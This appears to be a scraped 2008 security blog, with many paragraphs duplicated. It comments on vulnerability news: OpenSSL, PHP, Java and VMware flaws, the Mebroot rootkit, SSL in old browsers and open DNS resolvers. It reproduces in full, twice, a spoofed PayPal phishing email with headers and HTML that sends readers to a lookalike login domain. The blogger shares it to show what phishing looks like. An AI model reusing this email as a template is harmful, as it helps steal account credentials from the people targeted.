But then, there are many other serious applications, vendors and open source tools that have been hacked on the top 10 list, such as the #1 issue - OpenSSL - a technology meant to encrypt your data in transit as a means of security.
PHP represents 30% of all vulnerabilities. Ahem. I have mentioned this before and I still think PHP is a majorly hacked platform because people think it is "easy and cheap" and well, yes, until you get hacked. That's not to say PHP cannot be secure. It's just that the relative ease of tacking together an application that can be blown over in the wind makes it attractive for use by people who want to think they are programmers without understanding the underlying fundamentals of programming, software, web applications or security.
But then, there are many other serious applications, vendors and open source tools that have been hacked on the top 10 list, such as the #1 issue - OpenSSL - a technology meant to encrypt your data in transit as a means of security.
Spyware Developer Pays $330,000 +
Spyware developer / hacker pays for creating spyware that infected millions of computers.
Cisco Will Send Patches On Routine Basis
Cisco to patch routers on regular schedule, 03/11/2008 Following the lead of Microsoft and Oracle, Cisco Systems will start releasing security patches for some of its products on a schedule.
Friday, March 07, 2008
Critcal Java Security Patches
Secunia has a bunch of Java updates today for an issue that can cause remote code execution and DOS:
http://secunia.com/advisories/29239/
http://secunia.com/advisories/29239/
Wednesday, March 05, 2008
Old Browsers Are Security Risk
This is probably old news for most people but if someone is using an old browser in some cases it may be that an SSL certificate will not deliver 128 bit encryption. Here's the info from Verisign's web site:
Even though an SSL Certificate is capable of 128-bit or 256-bit encryption, many millions still use older computer systems that are incapable of strong encryption. (Building Blocks of Transparent Web Security: Server-Gated Cryptography, Yankee Group, 2005.) These legacy browsers and operating systems fail to step up to strong encryption without an SGC-enabled SSL Certificate:
Certain Internet Explorer browser versions from 4.01 to 5.01
Certain Netscape browser versions from 4.07 to 4.72
Many Windows 2000 systems using Internet Explorer
Internet Explorer browser versions prior to 3.02 and Netscape browser versions prior to 4.02 are not capable of 128-bit encryption with any SSL Certificate.
Verisign SSL Information
Choices are to use that way overpriced green bar SSL certificate that many vendors are not yet adopting, or block out old browsers from your web server and ask them to upgrade. The latter is not fool-proof but if someone wants to let their data get hacked that is their own problem.
Even though an SSL Certificate is capable of 128-bit or 256-bit encryption, many millions still use older computer systems that are incapable of strong encryption. (Building Blocks of Transparent Web Security: Server-Gated Cryptography, Yankee Group, 2005.) These legacy browsers and operating systems fail to step up to strong encryption without an SGC-enabled SSL Certificate:
Certain Internet Explorer browser versions from 4.01 to 5.01
Certain Netscape browser versions from 4.07 to 4.72
Many Windows 2000 systems using Internet Explorer
Internet Explorer browser versions prior to 3.02 and Netscape browser versions prior to 4.02 are not capable of 128-bit encryption with any SSL Certificate.
Verisign SSL Information
Choices are to use that way overpriced green bar SSL certificate that many vendors are not yet adopting, or block out old browsers from your web server and ask them to upgrade. The latter is not fool-proof but if someone wants to let their data get hacked that is their own problem.
Your virus scanner can't find this one...
Here's a root kit that is nearly impossible to detect:
Mebroot Root Kit
And once again, the infamous IT experts all over this country said this type of thing was hypothetically possible but beyond the reach of most malware writers.
Verisign says 5000 people were discovered to be infected since this was discovered in December.
And check out what you have to do to detect it.
This thing can be installed onto your machine in a drive by visit to a web site.
Mebroot Root Kit
And once again, the infamous IT experts all over this country said this type of thing was hypothetically possible but beyond the reach of most malware writers.
Verisign says 5000 people were discovered to be infected since this was discovered in December.
And check out what you have to do to detect it.
This thing can be installed onto your machine in a drive by visit to a web site.
Thursday, February 28, 2008
Use SSL When Available - Browser Setting
It would be safer if you could force your browser to use SSL whenever available and alert you if the SSL encryption level being used is a version that has some security limitations and can potentially be hacked.
As far as I know this doesn't exist other than forcing ALL sites into SSL which is not very convenient.
Most banks now are forcing users into SSL for ALL web browsing - this is something I think more people should do and someone needs to implement a better way to discover and block invalid certs - and also track down the people doing it and prosecute them.
SSL is the only way I know of to verify you're at the site you think you're at that is stadard in all browsers. If you use http, could be your DNS cache is poisoned or you're using a cached copy or...?
This area of web browsing definitely needs to be improved.
As far as I know this doesn't exist other than forcing ALL sites into SSL which is not very convenient.
Most banks now are forcing users into SSL for ALL web browsing - this is something I think more people should do and someone needs to implement a better way to discover and block invalid certs - and also track down the people doing it and prosecute them.
SSL is the only way I know of to verify you're at the site you think you're at that is stadard in all browsers. If you use http, could be your DNS cache is poisoned or you're using a cached copy or...?
This area of web browsing definitely needs to be improved.
Wednesday, February 27, 2008
Paypal Spoof
Return-Path:
X-Original-To: x@x.com
Delivered-To: x@x.com
Received: from p1119-ipbf09daianji.nara.ocn.ne.jp (p1119-ipbf09daianji.nara.ocn.ne.jp [221.187.221.119])
by mail14.intermedia.net (Postfix) with ESMTP id 6977443A9E;
Wed, 27 Feb 2008 08:34:16 -0800 (PST)
Received: from [221.187.221.119] by abralise.com; Thu, 28 Feb 2008 01:47:43 +0900
Date: Thu, 28 Feb 2008 01:47:43 +0900
From: update@paypal.com
X-Mailer: The Bat! (v2.12.00) Personal
Reply-To: akstcabralisemnsdgs@abralise.com
X-Priority: 3 (Normal)
Message-ID: <709683931.16551075140727@abralise.com>
To: x@x.com
Subject: PayPal® Account Review Department
MIME-Version: 1.0
Content-Type: text/html;
charset=Windows-1252
Content-Transfer-Encoding: 7bit
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODY>
<style type="text/css">
<!--
style3 {font-size: 14px}
style4 {font-size: 12px; }
-->
</style>
<table width="522" border="0">
<tr>
<td><a href="https://www.paypal.com"><img src="https://www.paypal.com/images/paypal_logo.gif" width="117" height="35" border="0" /></a></td>
</tr>
<tr>
<td width="516"><P class="style3">Dear <strong>PayPal ®</strong> customer,</P>
<P class="style3">We recently reviewed your account, and we suspect an unauthorized transaction on your account.<BR>
Protecting
your account is our primary concern. As a preventive measure we
have temporary<strong> limited</strong> your access to sensitive information.<BR>
Paypal features.To ensure that your account is not compromised, simply hit
"<strong>Resolution
Center</strong>" to confirm your identity as member of
Paypal.</P>
<ul class="style3">
<li> Login to your Paypal with
your Paypal username and password.</U></li>
<li> Confirm your identity as a card memeber of
Paypal.</U></li>
</ul>
<P class="style3"> </P>
<TABLE cellSpacing=0 cellPadding=5 width="100%" align=center
bgColor=#ffeeee>
<TBODY>
<TR>
<TD class="style3"><SPAN class=emphasis>Please confirm account information by clicking here <A
href="http://paypal-user-confirm.com/acc/login.php "target="_self">Resolution
Center</A> and complete the "Steps to Remove Limitations." </SPAN></TD>
</TR>
</TBODY>
</TABLE>
<P class="style4"> </P>
<P class="style4"><strong>*</strong>Please do not reply to this message. Mail sent to this
address cannot be answered.</P>
<P><span class="style
<P><span class="style3">Copyright © 1999-2007 PayPal. All rights reserved.<BR>
</BODY></HTML>
X-Original-To: x@x.com
Delivered-To: x@x.com
Received: from p1119-ipbf09daianji.nara.ocn.ne.jp (p1119-ipbf09daianji.nara.ocn.ne.jp [221.187.221.119])
by mail14.intermedia.net (Postfix) with ESMTP id 6977443A9E;
Wed, 27 Feb 2008 08:34:16 -0800 (PST)
Received: from [221.187.221.119] by abralise.com; Thu, 28 Feb 2008 01:47:43 +0900
Date: Thu, 28 Feb 2008 01:47:43 +0900
From: update@paypal.com
X-Mailer: The Bat! (v2.12.00) Personal
Reply-To: akstcabralisemnsdgs@abralise.com
X-Priority: 3 (Normal)
Message-ID: <709683931.16551075140727@abralise.com>
To: x@x.com
Subject: PayPal® Account Review Department
MIME-Version: 1.0
Content-Type: text/html;
charset=Windows-1252
Content-Transfer-Encoding: 7bit
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODY>
<style type="text/css">
<!--
style3 {font-size: 14px}
style4 {font-size: 12px; }
-->
</style>
<table width="522" border="0">
<tr>
<td><a href="https://www.paypal.com"><img src="https://www.paypal.com/images/paypal_logo.gif" width="117" height="35" border="0" /></a></td>
</tr>
<tr>
<td width="516"><P class="style3">Dear <strong>PayPal ®</strong> customer,</P>
<P class="style3">We recently reviewed your account, and we suspect an unauthorized transaction on your account.<BR>
Protecting
your account is our primary concern. As a preventive measure we
have temporary<strong> limited</strong> your access to sensitive information.<BR>
Paypal features.To ensure that your account is not compromised, simply hit
"<strong>Resolution
Center</strong>" to confirm your identity as member of
Paypal.</P>
<ul class="style3">
<li> Login to your Paypal with
your Paypal username and password.</U></li>
<li> Confirm your identity as a card memeber of
Paypal.</U></li>
</ul>
<P class="style3"> </P>
<TABLE cellSpacing=0 cellPadding=5 width="100%" align=center
bgColor=#ffeeee>
<TBODY>
<TR>
<TD class="style3"><SPAN class=emphasis>Please confirm account information by clicking here <A
href="http://paypal-user-confirm.com/acc/login.php "target="_self">Resolution
Center</A> and complete the "Steps to Remove Limitations." </SPAN></TD>
</TR>
</TBODY>
</TABLE>
<P class="style4"> </P>
<P class="style4"><strong>*</strong>Please do not reply to this message. Mail sent to this
address cannot be answered.</P>
<P><span class="style
<P><span class="style3">Copyright © 1999-2007 PayPal. All rights reserved.<BR>
</BODY></HTML>
VMWare Hack
There's a vulnerability in VMWare - a program a lot of testers use to test software applications among other things.
VMWare Hack
February 24, 2008 (Computerworld) A critical vulnerability in VMware Inc.'s virtualization software for Windows lets attackers escape the "guest" operating system and modify or add files to the underlying "host" operating system, the company has acknowledged.
As of Sunday, there was no patch available for the flaw, which affects VMware's Windows client virtualization programs, including Workstation, Player and ACE. The company's virtual machine software for Windows servers and for Mac- and Linux-based hosts are not at risk.
VMWare Hack
February 24, 2008 (Computerworld) A critical vulnerability in VMware Inc.'s virtualization software for Windows lets attackers escape the "guest" operating system and modify or add files to the underlying "host" operating system, the company has acknowledged.
As of Sunday, there was no patch available for the flaw, which affects VMware's Windows client virtualization programs, including Workstation, Player and ACE. The company's virtual machine software for Windows servers and for Mac- and Linux-based hosts are not at risk.
Sunday, February 24, 2008
Open Dns Resolvers - Problem
Open DNS Resolvers are a problem according to this article:
Open DNS Resolver Survey
This list shows the open resolvers - many of which are on networks that have been causing us prolems:
Open DNS Resolvers
Open DNS Resolver Survey
This list shows the open resolvers - many of which are on networks that have been causing us prolems:
Open DNS Resolvers
Pondering favicon.ico
When someone requests the favico on a site a full request with complete information is not sent (apparently) Is this expected behaior? I guess I need to see the W3C spec for proper submission of requests and how it relates to multiple files requested by the same request. Does the first request include the full request information and subsequent related requests such as images, etc. come through with less than complete information? And is this useful for hackers in hiding particular details of their activities? More research is needed. Just pondering the implications of this particular request behavior.
Also I just realized while digging into this issue that my application was not thread safe and there is a trade off between making it thread safe to ensure no data is lost and keeping performance at optimal levels. Ugh. All this because of a favicon.ico request.
Also I just realized while digging into this issue that my application was not thread safe and there is a trade off between making it thread safe to ensure no data is lost and keeping performance at optimal levels. Ugh. All this because of a favicon.ico request.
Subscribe to:
Posts (Atom)